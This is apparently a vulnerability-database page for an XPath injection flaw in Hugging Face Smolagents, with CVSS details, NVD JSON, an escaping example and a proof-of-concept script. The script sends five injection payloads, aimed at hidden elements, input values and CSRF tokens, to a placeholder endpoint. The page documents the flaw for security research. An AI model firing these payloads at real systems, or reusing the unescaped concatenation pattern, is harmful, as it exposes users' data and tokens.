Security Vulnerability Report
CVE-2025-11844 CVSS 5.4 MEDIUM

CVE-2025-11844

Published: 2025-10-22 14:15:49
Last Modified: 2025-10-30 17:43:35

Description

Hugging Face Smolagents version 1.20.0 contains an XPath injection vulnerability in the search_item_ctrl_f function located in src/smolagents/vision_web_browser.py. The function constructs an XPath query by directly concatenating user-supplied input into the XPath expression without proper sanitization or escaping. This allows an attacker to inject malicious XPath syntax that can alter the intended query logic. The vulnerability enables attackers to bypass search filters, access unintended DOM elements, and disrupt web automation workflows. This can lead to information disclosure, manipulation of AI agent interactions, and compromise the reliability of automated web tasks. The issue is fixed in version 1.22.0.
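Added example (not Smolagents code, not the project's patch, and not part of this page's PoC): the concatenation pattern quoted in the PoC comments on this page, next to a builder that encodes the search text as XPath 1.0 string data, so quotes in the input cannot close the string. The names `xpath_literal`, `build_search_xpath`, `skeleton` and `literal_value` are hypothetical, and `skeleton` uses a simple regular expression rather than a real XPath parser.

```python
import re

# Matches one XPath 1.0 string literal ('...' or "..."); a demonstration aid,
# not a full XPath tokenizer.
_LITERAL = re.compile(r"'[^']*'|\"[^\"]*\"")

# First payload string from the PoC section of this page.
PAGE_PAYLOAD = "test'] | //*[@class='secret-data'] | //*[contains(text(),'test"
# Constructed sample containing both quote characters.
BOTH_QUOTES = "it's a \"quoted\" word"


def xpath_literal(value: str) -> str:
    """Encode value as XPath 1.0 string data; XPath 1.0 has no escape character."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    # Both quote kinds present: split on ' and rejoin the pieces inside concat().
    parts = [f"'{piece}'" for piece in value.split("'")]
    return "concat(" + ", \"'\", ".join(parts) + ")"


def build_search_xpath(text: str, safe: bool = True) -> str:
    """Build the text-search query, either escaped or by raw concatenation."""
    if safe:
        return f"//*[contains(text(), {xpath_literal(text)})]"
    return f"//*[contains(text(), '{text}')]"  # pattern quoted in the PoC comments


def skeleton(expr: str) -> str:
    """Replace every string literal with S so only the query structure remains."""
    return _LITERAL.sub("S", expr)


def literal_value(literal: str) -> str:
    """Recover the string that an xpath_literal() result denotes."""
    return "".join(tok[1:-1] for tok in _LITERAL.findall(literal))


if __name__ == "__main__":
    for sample in ("login", PAGE_PAYLOAD, BOTH_QUOTES):
        for safe in (False, True):
            query = build_search_xpath(sample, safe)
            print(f"safe={safe!s:5} {skeleton(query)}")
```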

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:huggingface:smolagents:*:*:*:*:*:*:*:* - VULNERABLE
Hugging Face Smolagents < 1.22.0
Hugging Face Smolagents 1.20.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11844 - XPath Injection PoC for Hugging Face Smolagents
# Vulnerable function: search_item_ctrl_f in src/smolagents/vision_web_browser.py
# The function constructs XPath by directly concatenating user input without sanitization
import requests
import json

# Target Smolagents API endpoint (vision web browser search functionality)
TARGET_URL = "http://target-smolagents-instance:7860/api/search"

# Malicious XPath injection payloads
payloads = [
    # Payload 1: Bypass search filter to access hidden elements
    {
        "query": "test'] | //*[@class='secret-data'] | //*[contains(text(),'test",
        "description": "Bypass search filter to access elements with class 'secret-data'"
    },
    # Payload 2: Extract all input values from the page
    {
        "query": "anything'] | //input/@value | //*[contains(text(),'anything",
        "description": "Extract all input field values via XPath injection"
    },
    # Payload 3: Access admin panel elements
    {
        "query": "search'] | //*[@id='admin-panel']//* | //*[contains(text(),'search",
        "description": "Access admin panel DOM elements"
    },
    # Payload 4: Boolean-based blind XPath injection
    {
        "query": "test' and substring(name(/*),1,1)='h' and '1'='1",
        "description": "Blind XPath injection to enumerate document structure"
    },
    # Payload 5: Union-based XPath injection to extract sensitive data
    {
        "query": "x'] | //meta[@name='csrf-token']/@content | //*[contains(text(),'x",
        "description": "Extract CSRF tokens and other meta tag content"
    }
]


def exploit_xpath_injection(url, payload):
    """
    Send malicious XPath injection payload to the vulnerable
    search_item_ctrl_f function in Smolagents vision web browser.
    """
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Smolagents-Client/1.20.0"
    }
    data = {
        "action": "search_item_ctrl_f",
        "query": payload["query"],
        "page_url": "http://target-website.com/page"
    }
    try:
        response = requests.post(url, headers=headers, json=data, timeout=10)
        if response.status_code == 200:
            result = response.json()
            print(f"[+] Payload: {payload['description']}")
            print(f"[+] Query: {payload['query']}")
            print(f"[+] Response: {json.dumps(result, indent=2)}")
            return result
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return None
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


# Example of the vulnerable XPath construction:
# Original (vulnerable) code pattern:
# xpath_query = f"//*[contains(text(), '{user_input}')]"
#
# With injected payload: test'] | //*[@class='secret-data'] | //*[contains(text(),'test
# Resulting XPath: //*[contains(text(), 'test'] | //*[@class='secret-data'] | //*[contains(text(),'test')]
# This bypasses the intended search and returns elements with class 'secret-data'

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-11844 - XPath Injection PoC")
    print("Target: Hugging Face Smolagents < 1.22.0")
    print("=" * 60)
    for payload in payloads:
        exploit_xpath_injection(TARGET_URL, payload)
        print("-" * 60)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11844", "sourceIdentifier": "[email protected]", "published": "2025-10-22T14:15:49.457", "lastModified": "2025-10-30T17:43:35.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hugging Face Smolagents version 1.20.0 contains an XPath injection vulnerability in the search_item_ctrl_f function located in src/smolagents/vision_web_browser.py. The function constructs an XPath query by directly concatenating user-supplied input into the XPath expression without proper sanitization or escaping. This allows an attacker to inject malicious XPath syntax that can alter the intended query logic. The vulnerability enables attackers to bypass search filters, access unintended DOM elements, and disrupt web automation workflows. This can lead to information disclosure, manipulation of AI agent interactions, and compromise the reliability of automated web tasks. The issue is fixed in version 1.22.0."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-643"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:smolagents:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.20.0", "versionEndExcluding": "1.22.0", "matchCriteriaId": "4FBDA817-4B1A-4C1C-B28E-039793EE915C"}]}]}], "references": [{"url": "https://github.com/huggingface/smolagents/commit/f570ed5e17999d4cf7d5e79c2830fbaefab8a794", 
"source": "[email protected]", "tags": ["Patch"]}, {"url": "https://huntr.com/bounties/01ab4405-9bca-4b26-b7a3-5ca1863a69b4", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://huntr.com/bounties/01ab4405-9bca-4b26-b7a3-5ca1863a69b4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}